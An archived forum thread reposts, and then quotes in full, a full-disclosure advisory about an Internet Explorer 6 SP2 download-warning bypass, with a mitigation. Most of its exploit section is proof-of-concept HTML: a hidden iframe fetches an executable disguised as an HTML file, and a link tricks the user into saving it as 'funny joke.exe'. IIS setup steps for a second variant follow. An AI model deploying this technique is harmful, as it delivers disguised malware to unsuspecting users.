Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit

  • Thread starter JM Tella Llop [MVP Windows]
  • Start date
J

JM Tella Llop [MVP Windows]

Internet Explorer 6.0 SP2 File Download Security Warning Bypass
Exploit
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php

Microsoft Internet Explorer (including IE for Windows XP SP2) is
reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious
executable file masqueraded as a HTML file.

Secunia did not release the technical details (aka Security by
Obscurity) thus we publish this page (aka Full Disclosure)

Solution

[EN] Disable Active Scripting and the "Hide file extensions for known
file types" option [Tools->Folder Options->View]
[FR] Désactivez Active Scriptig et l'option "Masquer les extensions
des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage]


Credits : go to cyber flash


How does it work ? A.K.A Exploit

The following code requires no special server setup, and should work
from any webpage that IE 6.0 fetches:

<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');">
here</a>.
</body>
</html>

Also, here's an example that requires modifying the IIS Error Mapping
Properties (see below):
<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');">
here</a>.
</body>
</html>

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as
follows:

1. Error Code: 404
2. Default Text: Not Found
3. Message Type: URL
4. URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so
it will trigger a 404 error message as defined above. But, the
javascript code below references the stealthy v.exe data within the
frame 'NotFound' and is linked to 'funny joke.exe' when prompted to
save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');


» The original advisory (mirrored by K-OTik) is available here

--
Jose Manuel Tella Llop
MVP - Windows
(e-mail address removed) (quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna
clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.
 
G

Guest

JM Tella Llop said:
Internet Explorer 6.0 SP2 File Download Security Warning Bypass
Exploit
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php

Microsoft Internet Explorer (including IE for Windows XP SP2) is
reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious
executable file masqueraded as a HTML file.

Secunia did not release the technical details (aka Security by
Obscurity) thus we publish this page (aka Full Disclosure)

Solution

[EN] Disable Active Scripting and the "Hide file extensions for known
file types" option [Tools->Folder Options->View]
[FR] Désactivez Active Scriptig et l'option "Masquer les extensions
des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage]


Credits : go to cyber flash


How does it work ? A.K.A Exploit

The following code requires no special server setup, and should work
from any webpage that IE 6.0 fetches:

<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');">
here</a>.
</body>
</html>

Also, here's an example that requires modifying the IIS Error Mapping
Properties (see below):
<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>Click
<a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');">
here</a>.
</body>
</html>

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as
follows:

1. Error Code: 404
2. Default Text: Not Found
3. Message Type: URL
4. URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so
it will trigger a 404 error message as defined above. But, the
javascript code below references the stealthy v.exe data within the
frame 'NotFound' and is linked to 'funny joke.exe' when prompted to
save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');


» The original advisory (mirrored by K-OTik) is available here

--
Jose Manuel Tella Llop
MVP - Windows
(e-mail address removed) (quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna
clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.
Download, install and set Mozilla Firefox as your default browser.
http://www.mozilla.org/ However, you must use IE6 for Windows and Office
Updates.
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Top